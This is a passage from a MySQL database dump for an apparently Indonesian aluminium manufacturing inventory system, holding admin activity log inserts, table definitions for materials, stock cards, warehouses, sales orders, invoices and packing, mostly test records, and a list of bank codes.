'2012-11-26 13:41:48', 'admin', 'add material RAE-0001'); INSERT INTO log VALUES ('704', '2012-11-26 13:42:26', 'admin', 'ubah data material group RAE'); INSERT INTO log VALUES ('705', '2012-11-26 13:44:32', 'admin', 'edit material RAE-0001'); INSERT INTO log VALUES ('706', '2012-11-26 13:55:33', 'admin', 'add finished goods FBI-0001'); INSERT INTO log VALUES ('707', '2012-11-26 13:56:15', 'admin', 'delete data finished goods WIP4'); INSERT INTO log VALUES ('708', '2012-11-26 13:56:20', 'admin', 'delete data finished goods WIP3'); INSERT INTO log VALUES ('709', '2012-11-26 13:57:30', 'admin', 'add finished goods WBI-0001'); INSERT INTO log VALUES ('710', '2012-11-26 13:57:35', 'admin', 'delete data finished goods WIP1'); INSERT INTO log VALUES ('711', '2012-11-26 13:57:41', 'admin', 'delete data finished goods WIP2'); INSERT INTO log VALUES ('712', '2012-11-26 14:03:44', 'admin', 'Add initial balance material 1 2012-11-26'); INSERT INTO log VALUES ('713', '2012-11-26 14:04:05', 'admin', 'Delete initial balance material 1 2012-11-26'); INSERT INTO log VALUES ('714', '2012-11-26 14:04:18', 'admin', 'Delete initial balance material 1 2012-10-17'); INSERT INTO log VALUES ('715', '2012-11-26 14:04:27', 'admin', 'Delete initial balance material 1 2012-11-13'); INSERT INTO log VALUES ('716', '2012-11-26 14:04:57', 'admin', 'Add initial balance material 1 2012-11-26'); INSERT INTO log VALUES ('717', '2012-11-26 14:05:16', 'admin', 'Delete initial balance material 3 2012-10-17'); INSERT INTO log VALUES ('718', '2012-11-26 14:05:41', 'admin', 'Add initial balance material 3 2012-11-26'); INSERT INTO log VALUES ('719', '2012-11-26 14:06:12', 'admin', 'Add initial balance wip 2 2012-11-26'); INSERT INTO log VALUES ('720', '2012-11-26 14:16:03', 'admin', 'Add initial balance machine & office equipment 1 2012-11-26 12'); INSERT INTO log VALUES ('721', '2012-11-26 14:16:34', 'admin', 'Delete consumption list 123'); INSERT INTO log VALUES ('722', '2012-11-26 14:54:10', 'admin', 'Add consumption list FBI-0001'); INSERT INTO log VALUES ('723', '2012-11-26 14:54:18', 'admin', 'Delete consumption list FBI-0001'); INSERT INTO log VALUES ('724', '2012-11-26 14:55:46', 'admin', 'Add consumption list FBI-0001'); INSERT INTO log VALUES ('725', '2012-11-26 09:13:41', 'admin', 'logout'); INSERT INTO log VALUES ('726', '2012-11-26 15:15:31', 'admin', 'login'); INSERT INTO log VALUES ('727', '2012-11-26 09:21:14', 'admin', 'logout'); INSERT INTO log VALUES ('728', '2012-11-28 13:59:00', 'admin', 'login'); INSERT INTO log VALUES ('729', '2012-11-28 13:59:57', 'admin', 'ubah data unit of items KGM'); INSERT INTO log VALUES ('730', '2012-11-28 15:28:07', 'admin', 'login'); INSERT INTO log VALUES ('731', '2012-11-28 09:56:18', 'admin', 'logout'); INSERT INTO log VALUES ('732', '2012-11-29 08:28:59', 'admin', 'login'); INSERT INTO log VALUES ('733', '2012-12-04 09:34:49', 'admin', 'login'); INSERT INTO log VALUES ('734', '2012-12-04 12:32:01', 'admin', 'login'); INSERT INTO log VALUES ('735', '2012-12-04 06:32:38', 'admin', 'logout'); INSERT INTO log VALUES ('736', '2012-12-04 19:48:03', 'admin', 'login'); INSERT INTO log VALUES ('737', '2012-12-04 20:16:50', 'admin', 'tambah data company PT. INDAL'); INSERT INTO log VALUES ('738', '2012-12-06 10:53:36', 'admin', 'login'); -- ---------------------------- -- Table structure for `mat_group` -- ---------------------------- DROP TABLE IF EXISTS `mat_group`; CREATE TABLE `mat_group` ( `matgroup_code` varchar(4) NOT NULL, `matgroup_name` varchar(30) DEFAULT NULL, `HsNo` varchar(20) DEFAULT NULL, `desc` varchar(50) DEFAULT NULL, PRIMARY KEY (`matgroup_code`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mat_group -- ---------------------------- INSERT INTO mat_group VALUES ('RAC', 'Aluminium Coil', '7606.12.90.00', null); INSERT INTO mat_group VALUES ('RAE', 'Aluminium Extrusion', '7604.29.90.00', null); INSERT INTO mat_group VALUES ('RAR', 'Aluminium Circle', null, null); INSERT INTO mat_group VALUES ('RAS', 'Aluminium Sheet', '-', null); INSERT INTO mat_group VALUES ('RMO', 'Others', '-', null); INSERT INTO mat_group VALUES ('STL', 'Steel', null, null); INSERT INTO mat_group VALUES ('ZSNC', 'ZSNC Ecotrio', '7210.49.19.00', null); -- ---------------------------- -- Table structure for `mat_incdet` -- ---------------------------- DROP TABLE IF EXISTS `mat_incdet`; CREATE TABLE `mat_incdet` ( `matin_id` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor ID Transaksi Incoming Material', `child_no` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor Item di Transaksi Detail', `mat_id` varchar(20) NOT NULL DEFAULT '0' COMMENT 'ID Material Yang Masuk', `qty` decimal(9,2) NOT NULL DEFAULT '0.00' COMMENT 'Jumlah Quantity Saat Masuk', `price` decimal(12,2) DEFAULT NULL, PRIMARY KEY (`matin_id`,`child_no`), CONSTRAINT `mat_incdet_ibfk_1` FOREIGN KEY (`matin_id`) REFERENCES `mat_inchdr` (`matin_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='Detail Transaksi Incoming Material'; -- ---------------------------- -- Records of mat_incdet -- ---------------------------- INSERT INTO mat_incdet VALUES ('1', '1', 'ALME0002', '200.00', '100.00'); INSERT INTO mat_incdet VALUES ('2', '1', 'M001', '100.00', '200.00'); INSERT INTO mat_incdet VALUES ('2', '2', 'P001', '200.00', '100.00'); INSERT INTO mat_incdet VALUES ('3', '1', 'SC001', '40.00', '0.00'); -- ---------------------------- -- Table structure for `mat_inchdr` -- ---------------------------- DROP TABLE IF EXISTS `mat_inchdr`; CREATE TABLE `mat_inchdr` ( `matin_id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Nomor ID Incoming', `matin_type` enum('0','1','2','3') DEFAULT '0' COMMENT '0=purchase,1=replacement,2=from production,3=scrap', `matin_no` varchar(30) NOT NULL COMMENT 'Nomor Transaksi Masuk Barang', `matin_date` date NOT NULL COMMENT 'Tanggal dan Jam Kedatangan Barang', `currency` varchar(3) DEFAULT NULL, `po_id` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor ID Purchase Order', `wh_id` int(2) NOT NULL DEFAULT '0' COMMENT 'Gudang Tempat Menyimpan Barang', `supplier` varchar(50) DEFAULT NULL, `supl_do` varchar(20) NOT NULL DEFAULT '' COMMENT 'Nomor Surat Jalan dari Supplier', `supl_inv` varchar(20) DEFAULT NULL, `KdJnsDok` tinyint(1) DEFAULT NULL, `CAR` varchar(6) DEFAULT NULL, `tot_qty` decimal(9,0) NOT NULL DEFAULT '0' COMMENT 'Jumlah Dalam Bentuang Rupiah', `tot_amount` decimal(12,2) DEFAULT NULL, `notes` varchar(80) NOT NULL DEFAULT '' COMMENT 'Catatan dari Kedatangan Barang', PRIMARY KEY (`matin_id`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1 COMMENT='Header Incoming Material'; -- ---------------------------- -- Records of mat_inchdr -- ---------------------------- INSERT INTO mat_inchdr VALUES ('1', '1', '001', '2012-08-06', 'USD', '5', '0', 'PT. ALUMINDO LIGHT METAL INDUSTRY', 'do001', '', '5', null, '0', null, '3'); INSERT INTO mat_inchdr VALUES ('2', '0', '002', '2012-10-28', 'Rp', '6', '0', 'PT. DIHEN BERSAMA', '003', '', '8', null, '0', null, 'Just a test'); INSERT INTO mat_inchdr VALUES ('3', '2', '003', '2012-10-28', '', '0', '0', '', '', '', '0', null, '0', null, 'tes scrap'); -- ---------------------------- -- Table structure for `mat_opnamedet` -- ---------------------------- DROP TABLE IF EXISTS `mat_opnamedet`; CREATE TABLE `mat_opnamedet` ( `opname_id` int(10) NOT NULL, `child_no` int(10) NOT NULL, `mat_id` varchar(8) NOT NULL, `qty` decimal(12,2) NOT NULL DEFAULT '0.00' COMMENT 'jumlah stok opname', `qty_bal` decimal(12,2) DEFAULT NULL, `qty_diff` decimal(12,2) DEFAULT NULL, `qty_in` decimal(12,2) NOT NULL DEFAULT '0.00' COMMENT 'adjustment (tambah)', `qty_out` decimal(12,2) NOT NULL DEFAULT '0.00' COMMENT 'adjustment (kurang)', PRIMARY KEY (`opname_id`,`child_no`), CONSTRAINT `mat_opnamedet_ibfk_1` FOREIGN KEY (`opname_id`) REFERENCES `mat_opnamehdr` (`opname_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mat_opnamedet -- ---------------------------- INSERT INTO mat_opnamedet VALUES ('1', '1', '123', '50.00', '105.00', '55.00', '0.00', '55.00'); INSERT INTO mat_opnamedet VALUES ('2', '1', 'ALME0002', '60.00', '-100.00', '160.00', '160.00', '0.00'); INSERT INTO mat_opnamedet VALUES ('2', '2', 'ALME0003', '900.00', '0.00', '900.00', '900.00', '0.00'); INSERT INTO mat_opnamedet VALUES ('3', '1', 'SC001', '30.00', '40.00', '10.00', '0.00', '10.00'); INSERT INTO mat_opnamedet VALUES ('3', '2', 'M001', '5.00', '10.00', '5.00', '0.00', '5.00'); INSERT INTO mat_opnamedet VALUES ('3', '3', 'P001', '5.00', '5.00', '0.00', '0.00', '0.00'); -- ---------------------------- -- Table structure for `mat_opnamehdr` -- ---------------------------- DROP TABLE IF EXISTS `mat_opnamehdr`; CREATE TABLE `mat_opnamehdr` ( `opname_id` int(10) NOT NULL AUTO_INCREMENT, `opname_date` date NOT NULL, `wh_id` int(10) NOT NULL COMMENT 'Warehouse ID', `mat_type` enum('0','1','2') DEFAULT NULL COMMENT '0= Finished Goods, 1= material, 2=wip', `tot_qty` decimal(12,2) DEFAULT NULL, `status` enum('0','1') DEFAULT '0' COMMENT '0=opname,1=adjust', `notes` varchar(100) DEFAULT NULL, PRIMARY KEY (`opname_id`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mat_opnamehdr -- ---------------------------- INSERT INTO mat_opnamehdr VALUES ('1', '2012-09-12', '3', '0', '50.00', '1', null); INSERT INTO mat_opnamehdr VALUES ('2', '2012-09-12', '1', '1', '960.00', '1', null); INSERT INTO mat_opnamehdr VALUES ('3', '2012-10-28', '1', '1', '40.00', '1', ''); -- ---------------------------- -- Table structure for `mat_outdet` -- ---------------------------- DROP TABLE IF EXISTS `mat_outdet`; CREATE TABLE `mat_outdet` ( `matout_id` int(10) NOT NULL DEFAULT '0' COMMENT 'ID Transaksi OutGoing Material', `child_no` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor Item detail OutGoing', `mat_id` varchar(20) NOT NULL DEFAULT '0' COMMENT 'ID Material Yang Dikeluarkan', `qty` decimal(9,2) NOT NULL DEFAULT '0.00' COMMENT 'Jumlah Quantity yang dikeluarkan', PRIMARY KEY (`matout_id`,`child_no`), KEY `MAT_ID` (`matout_id`,`child_no`), CONSTRAINT `mat_outdet_ibfk_1` FOREIGN KEY (`matout_id`) REFERENCES `mat_outhdr` (`matout_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='Detail Transaksi Outgoing Material'; -- ---------------------------- -- Records of mat_outdet -- ---------------------------- INSERT INTO mat_outdet VALUES ('3', '1', 'ALME0002', '500.00'); INSERT INTO mat_outdet VALUES ('4', '1', 'ALME0002', '500.00'); INSERT INTO mat_outdet VALUES ('5', '1', 'SC001', '10.00'); INSERT INTO mat_outdet VALUES ('6', '1', 'M001', '100.00'); INSERT INTO mat_outdet VALUES ('6', '2', 'P001', '200.00'); INSERT INTO mat_outdet VALUES ('7', '1', 'M001', '5.00'); -- ---------------------------- -- Table structure for `mat_outhdr` -- ---------------------------- DROP TABLE IF EXISTS `mat_outhdr`; CREATE TABLE `mat_outhdr` ( `matout_id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'ID Transaksi OutGoing Material', `matout_type` enum('0','1','2','3') DEFAULT '0' COMMENT '0=Consumption, 1=Return, 2=From Production, 3=scrap', `matout_no` varchar(20) NOT NULL DEFAULT '' COMMENT 'Nomor Transaksi Pengeluaran', `matout_date` date NOT NULL COMMENT 'Tanggal dan Jam PengeluaranMaterial', `wo_id` int(10) NOT NULL COMMENT 'ID Work Order', `ref_id` int(10) DEFAULT NULL, `ref_no` varchar(20) DEFAULT NULL, `from_wh_id` int(2) NOT NULL DEFAULT '0' COMMENT 'Digunakan Jika Out Type T', `to_wh_id` int(2) NOT NULL DEFAULT '0' COMMENT 'Digunakan Jika Out Type T', `tot_qty` decimal(12,2) DEFAULT NULL, `notes` char(80) NOT NULL DEFAULT '' COMMENT 'Catatan Pengeluaran', `KdJnsDok` tinyint(1) DEFAULT NULL, `CAR` varchar(6) DEFAULT NULL, PRIMARY KEY (`matout_id`) ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=latin1 COMMENT='Header Transaksi Outgoing Material'; -- ---------------------------- -- Records of mat_outhdr -- ---------------------------- INSERT INTO mat_outhdr VALUES ('3', '0', '001', '2012-08-08', '3', null, null, '0', '0', '500.00', 'tes', null, null); INSERT INTO mat_outhdr VALUES ('4', '3', '001', '2012-09-26', '0', '3', '001', '0', '0', '500.00', '', null, null); INSERT INTO mat_outhdr VALUES ('5', '2', '002', '2012-10-28', '0', null, null, '0', '0', '10.00', 'Tes scrap out', null, null); INSERT INTO mat_outhdr VALUES ('6', '2', '003', '2012-10-28', '0', null, null, '0', '0', '300.00', '', null, null); INSERT INTO mat_outhdr VALUES ('7', '1', '004', '2012-10-30', '0', null, null, '0', '0', '5.00', 'tes BC 41', '6', null); -- ---------------------------- -- Table structure for `mat_stockcard` -- ---------------------------- DROP TABLE IF EXISTS `mat_stockcard`; CREATE TABLE `mat_stockcard` ( `kd_fac` char(2) NOT NULL COMMENT 'Kode Factory', `wh_id` int(10) NOT NULL COMMENT 'Warehouse ID', `mat_type` tinyint(2) NOT NULL, `mat_id` varchar(20) NOT NULL DEFAULT '0' COMMENT 'ID Material', `date` date NOT NULL COMMENT 'Tanggal dan Waktu Transaksi', `type` char(1) NOT NULL DEFAULT 'B' COMMENT 'B=Begining,I=Incoming,O=Outgoing,R=Retur,D=Damage/Missing', `qty` decimal(9,2) NOT NULL DEFAULT '0.00' COMMENT 'Jumlah Quantity Transaksi', `price` decimal(19,3) NOT NULL DEFAULT '0.000' COMMENT 'Harga Satuan Transaksi', `qty_bal` decimal(8,0) NOT NULL DEFAULT '0' COMMENT 'Jumlah Quantity Saldo', `amt_bal` decimal(19,3) NOT NULL DEFAULT '0.000' COMMENT 'Jumlah Amount Rupiah Saldo', PRIMARY KEY (`kd_fac`,`wh_id`,`mat_id`,`date`,`type`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Transaksi Stock Card'; -- ---------------------------- -- Records of mat_stockcard -- ---------------------------- INSERT INTO mat_stockcard VALUES ('01', '1', '12', 'SC001', '2012-11-26', 'B', '100.00', '0.000', '100', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '2', '11', 'WBI-0001', '2012-11-26', 'B', '200.00', '0.000', '200', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '3', '0', 'FBI-0001', '2012-11-26', 'B', '100.00', '0.000', '100', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '2', '11', 'WIP1', '2012-10-18', 'B', '25.00', '0.000', '25', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '2', '11', 'WIP2', '2012-10-18', 'B', '50.00', '0.000', '50', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '2', '11', 'WIP4', '2012-10-18', 'B', '75.00', '0.000', '75', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '3', 'M002', '2012-09-30', 'B', '20.00', '0.000', '20', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '3', 'M001', '2012-09-30', 'B', '10.00', '0.000', '10', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '5', 'P002', '2012-09-30', 'B', '10.00', '0.000', '10', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '5', 'P001', '2012-09-30', 'B', '5.00', '0.000', '5', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '2', '11', 'WIP1', '2012-10-18', 'I', '222.00', '0.000', '222', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '2', '11', 'WIP1', '2012-10-18', 'O', '2.00', '0.000', '2', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '3', '0', '123', '2012-10-18', 'I', '100.00', '0.000', '100', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '12', 'SC001', '2012-10-28', 'B', '10.00', '0.000', '10', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '12', 'SC001', '2012-09-30', 'B', '10.00', '0.000', '10', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '3', 'M003', '2012-09-30', 'B', '30.00', '0.000', '30', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '5', 'P003', '2012-09-30', 'B', '15.00', '0.000', '15', '0.000'); INSERT INTO mat_stockcard VALUES ('01', '1', '1', 'RAE-0001', '2012-11-26', 'B', '100.00', '0.000', '100', '0.000'); -- ---------------------------- -- Table structure for `mat_warehouse` -- ---------------------------- DROP TABLE IF EXISTS `mat_warehouse`; CREATE TABLE `mat_warehouse` ( `wh_id` int(2) NOT NULL DEFAULT '0' COMMENT 'Nomor Id Warehouse', `wh_name` varchar(50) NOT NULL DEFAULT '' COMMENT 'Nama Warehouse', PRIMARY KEY (`wh_id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Master Gudang'; -- ---------------------------- -- Records of mat_warehouse -- ---------------------------- INSERT INTO mat_warehouse VALUES ('1', 'WAREHOUSE MATERIAL'); INSERT INTO mat_warehouse VALUES ('2', 'WAREHOUSE PRODUKSI'); INSERT INTO mat_warehouse VALUES ('3', 'WAREHOUSE FINISHED GOODS'); INSERT INTO mat_warehouse VALUES ('4', 'WAREHOUSE SCRAP'); -- ---------------------------- -- Table structure for `mkt_comminvdet` -- ---------------------------- DROP TABLE IF EXISTS `mkt_comminvdet`; CREATE TABLE `mkt_comminvdet` ( `comm_id` int(10) NOT NULL DEFAULT '0' COMMENT 'Id Paking', `child_no` int(10) NOT NULL, `fg_id` varchar(20) DEFAULT NULL, `qty` decimal(8,0) NOT NULL DEFAULT '0' COMMENT 'Jumlah quantity / pasang', `price` decimal(8,3) NOT NULL DEFAULT '0.000' COMMENT 'Jumlah Karton', PRIMARY KEY (`comm_id`,`child_no`), CONSTRAINT `mkt_comminvdet_ibfk_1` FOREIGN KEY (`comm_id`) REFERENCES `mkt_comminvhdr` (`comm_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mkt_comminvdet -- ---------------------------- INSERT INTO mkt_comminvdet VALUES ('1', '1', 'LUS23003AY', '100', '200.000'); -- ---------------------------- -- Table structure for `mkt_comminvhdr` -- ---------------------------- DROP TABLE IF EXISTS `mkt_comminvhdr`; CREATE TABLE `mkt_comminvhdr` ( `comm_id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Id Commercial Invoice', `comm_no` varchar(25) CHARACTER SET latin1 NOT NULL DEFAULT '' COMMENT 'Nomor Commercial Invoice', `comm_date` date NOT NULL COMMENT 'Tanggal Commercial Invoice', `do_id` int(10) NOT NULL DEFAULT '0' COMMENT 'ID Delevery Order Yang Dipilih', `payment` varchar(15) COLLATE utf8_unicode_ci DEFAULT NULL, `pol` varchar(30) COLLATE utf8_unicode_ci DEFAULT NULL, `pod` varchar(30) COLLATE utf8_unicode_ci DEFAULT NULL, `container` varchar(50) COLLATE utf8_unicode_ci DEFAULT NULL, `currency` char(5) CHARACTER SET latin1 NOT NULL DEFAULT '''USD''' COMMENT 'Jenis Mata Uang', `vessel` varchar(30) COLLATE utf8_unicode_ci DEFAULT NULL, `voy_no` varchar(15) COLLATE utf8_unicode_ci DEFAULT NULL, `sail_date` date DEFAULT NULL, `fob` decimal(12,2) NOT NULL DEFAULT '0.00' COMMENT 'PPN 10%', `freight` decimal(12,2) NOT NULL COMMENT 'Ongkos Angkut', `insurance` decimal(12,2) NOT NULL COMMENT 'Asuransi', `cnf` decimal(12,2) DEFAULT NULL, `tot_qty` decimal(12,2) NOT NULL DEFAULT '0.00' COMMENT 'Total Quantity', `tot_amount` decimal(14,2) NOT NULL DEFAULT '0.00' COMMENT 'Total Uang', `notify` varchar(50) COLLATE utf8_unicode_ci DEFAULT NULL, `auth_sign` varchar(30) COLLATE utf8_unicode_ci DEFAULT NULL, `notes` varchar(50) COLLATE utf8_unicode_ci DEFAULT NULL, PRIMARY KEY (`comm_id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- ---------------------------- -- Records of mkt_comminvhdr -- ---------------------------- INSERT INTO mkt_comminvhdr VALUES ('1', '111', '2012-09-04', '1', 'LC', 'A', 'B', '123456', 'USD', '1', '2', '0000-00-00', '3.00', '4.00', '5.00', '6.00', '100.00', '20000.00', null, null, null); -- ---------------------------- -- Table structure for `mkt_dodet` -- ---------------------------- DROP TABLE IF EXISTS `mkt_dodet`; CREATE TABLE `mkt_dodet` ( `do_id` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor ID Transaksi Sales Order', `child_no` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor Item Detail Transaksi', `fg_id` varchar(10) NOT NULL DEFAULT '0' COMMENT 'Nomor ID Finish Good', `qty` decimal(12,2) NOT NULL DEFAULT '0.00' COMMENT 'Quatity yang ditawarkan', `price` decimal(12,2) DEFAULT NULL, PRIMARY KEY (`do_id`,`child_no`), CONSTRAINT `mkt_dodet_ibfk_1` FOREIGN KEY (`do_id`) REFERENCES `mkt_dohdr` (`do_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='Detail Transaksi Pemesanan Barang Produk dari Customer'; -- ---------------------------- -- Records of mkt_dodet -- ---------------------------- INSERT INTO mkt_dodet VALUES ('2', '1', '123', '200.00', '3.00'); -- ---------------------------- -- Table structure for `mkt_dohdr` -- ---------------------------- DROP TABLE IF EXISTS `mkt_dohdr`; CREATE TABLE `mkt_dohdr` ( `do_id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Nomor ID Transaksi Delivery Order', `do_no` char(25) NOT NULL DEFAULT '' COMMENT 'Nomor Delivery Order', `do_date` date NOT NULL COMMENT 'Tanggal dan Waktu Transaksi', `so_id` int(10) NOT NULL DEFAULT '0' COMMENT 'ID Work Instruction', `vehicle_no` varchar(15) NOT NULL DEFAULT '' COMMENT 'Nomor Polisi Kendaraan', `driver` varchar(30) NOT NULL DEFAULT '' COMMENT 'Nama Sopir Pengirim', `tot_qty` decimal(9,2) DEFAULT NULL, `tot_amount` decimal(15,2) DEFAULT NULL, `notes` char(80) NOT NULL DEFAULT '' COMMENT 'Catatan Transaksi Pesanan', PRIMARY KEY (`do_id`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1 COMMENT='Table Header Pemesanan dari Customer'; -- ---------------------------- -- Records of mkt_dohdr -- ---------------------------- INSERT INTO mkt_dohdr VALUES ('2', '111', '2012-09-27', '25', '1', '1', '200.00', '600.00', 'aaa'); -- ---------------------------- -- Table structure for `mkt_packingdet` -- ---------------------------- DROP TABLE IF EXISTS `mkt_packingdet`; CREATE TABLE `mkt_packingdet` ( `pack_id` int(10) NOT NULL DEFAULT '0' COMMENT 'Id Paking', `child_no` int(10) NOT NULL, `fg_id` varchar(20) DEFAULT NULL, `fromct` int(10) DEFAULT NULL, `toct` int(10) DEFAULT NULL, `qty` decimal(12,2) NOT NULL DEFAULT '0.00' COMMENT 'Jumlah quantity / pasang', `amount` decimal(12,2) DEFAULT NULL, `remark` varchar(40) CHARACTER SET latin1 COLLATE latin1_general_ci NOT NULL DEFAULT '' COMMENT 'Keterangan Detail', PRIMARY KEY (`pack_id`,`child_no`), CONSTRAINT `mkt_packingdet_ibfk_1` FOREIGN KEY (`pack_id`) REFERENCES `mkt_packinghdr` (`pack_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mkt_packingdet -- ---------------------------- -- ---------------------------- -- Table structure for `mkt_packinghdr` -- ---------------------------- DROP TABLE IF EXISTS `mkt_packinghdr`; CREATE TABLE `mkt_packinghdr` ( `pack_id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Id Packing', `pack_no` varchar(25) NOT NULL DEFAULT '' COMMENT 'Nomor Packing', `pack_date` date NOT NULL COMMENT 'Tanggal dan Waktu Pengiriman', `comm_id` int(10) NOT NULL DEFAULT '0' COMMENT 'ID Sales Order yang pilih', `tot_ctn` decimal(8,0) NOT NULL DEFAULT '0' COMMENT 'Total Carton', `tot_amount` decimal(12,2) DEFAULT NULL, `size` varchar(100) NOT NULL, `notes` varchar(80) CHARACTER SET latin1 COLLATE latin1_general_ci NOT NULL DEFAULT '' COMMENT 'Keterangan dari Entry Packing', PRIMARY KEY (`pack_id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mkt_packinghdr -- ---------------------------- -- ---------------------------- -- Table structure for `mkt_sorderdet` -- ---------------------------- DROP TABLE IF EXISTS `mkt_sorderdet`; CREATE TABLE `mkt_sorderdet` ( `so_id` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor ID Transaksi Sales Order', `child_no` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor Item Detail Transaksi', `fg_id` varchar(20) NOT NULL DEFAULT '0' COMMENT 'Nomor ID Finish Good', `qty` decimal(9,0) NOT NULL DEFAULT '0' COMMENT 'Quantity yang Dipesan', `price` decimal(19,3) NOT NULL DEFAULT '0.000' COMMENT 'Harga Baran Jadi', PRIMARY KEY (`so_id`,`child_no`), CONSTRAINT `mkt_sorderdet_ibfk_1` FOREIGN KEY (`so_id`) REFERENCES `mkt_sorderhdr` (`so_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='Detail Transaksi Pemesanan Barang Produk dari Customer'; -- ---------------------------- -- Records of mkt_sorderdet -- ---------------------------- INSERT INTO mkt_sorderdet VALUES ('25', '1', '123', '300', '2.000'); -- ---------------------------- -- Table structure for `mkt_sorderhdr` -- ---------------------------- DROP TABLE IF EXISTS `mkt_sorderhdr`; CREATE TABLE `mkt_sorderhdr` ( `so_id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Nomor ID Transaksi Sales Order', `so_no` varchar(20) NOT NULL DEFAULT '' COMMENT 'Nomor Pesanan Customer', `so_date` date NOT NULL COMMENT 'Tanggal dan Waktu Transaksi', `cust` varchar(50) NOT NULL COMMENT 'Kode Customer', `currency` varchar(3) NOT NULL DEFAULT 'IDR' COMMENT 'Jenis Matauang yang digunakan', `due_date` date NOT NULL, `tot_qty` decimal(9,2) NOT NULL DEFAULT '0.00' COMMENT 'Total Qty Pesanan', `tot_amount` decimal(15,2) DEFAULT NULL, `notes` varchar(80) NOT NULL DEFAULT '' COMMENT 'Catatan Transaksi Pesanan', PRIMARY KEY (`so_id`) ) ENGINE=InnoDB AUTO_INCREMENT=26 DEFAULT CHARSET=latin1 COMMENT='Table Header Pemesanan dari Customer'; -- ---------------------------- -- Records of mkt_sorderhdr -- ---------------------------- INSERT INTO mkt_sorderhdr VALUES ('25', '002', '2012-09-11', 'DENON', 'USD', '2012-09-13', '300.00', '600.00', '1222'); -- ---------------------------- -- Table structure for `mst_bank` -- ---------------------------- DROP TABLE IF EXISTS `mst_bank`; CREATE TABLE `mst_bank` ( `KdBank` varchar(3) NOT NULL DEFAULT '', `NmBank` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdBank`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_bank -- ---------------------------- INSERT INTO mst_bank VALUES ('002', 'Bank BRI'); INSERT INTO mst_bank VALUES ('008', 'Bank Mandiri'); INSERT INTO mst_bank VALUES ('009', 'Bank BNI'); INSERT INTO mst_bank VALUES ('011', 'Bank Danamon'); INSERT INTO mst_bank VALUES ('013', 'Bank Permata'); INSERT INTO mst_bank VALUES ('016', 'Bank BII'); INSERT INTO mst_bank VALUES ('019', 'Bank Panin'); INSERT INTO mst_bank VALUES ('020', 'Bank Arta Niaga Kenc'); INSERT INTO mst_bank VALUES ('022', 'Bank Niaga'); INSERT INTO mst_bank VALUES ('023', 'Bank UOB Buana'); INSERT INTO mst_bank VALUES ('026', 'LippoBank'); INSERT INTO mst_bank VALUES ('028', 'Bank NISP'); INSERT INTO mst_bank VALUES ('050', 'Standard Chartered B'); INSERT INTO mst_bank VALUES ('052', 'ABN AMRO'); INSERT INTO mst_bank VALUES ('093', 'Bank IFI'); INSERT INTO mst_bank VALUES ('097', 'Bank Mayapada'); INSERT INTO mst_bank VALUES ('110', 'Bank Jabar'); INSERT INTO mst_bank VALUES ('111', 'Bank DKI'); INSERT INTO mst_bank VALUES ('112', 'Bank BPD DIY'); INSERT INTO mst_bank VALUES ('114', 'Bank Jatim'); INSERT INTO mst_bank VALUES ('115', 'Bank BPD Jambi'); INSERT INTO mst_bank VALUES ('116', 'Bank BPD Aceh'); INSERT INTO mst_bank VALUES ('117', 'Bank Sumut'); INSERT INTO mst_bank VALUES ('118', 'Bank Nagari'); INSERT INTO mst_bank VALUES ('119', 'Bank Riau'); 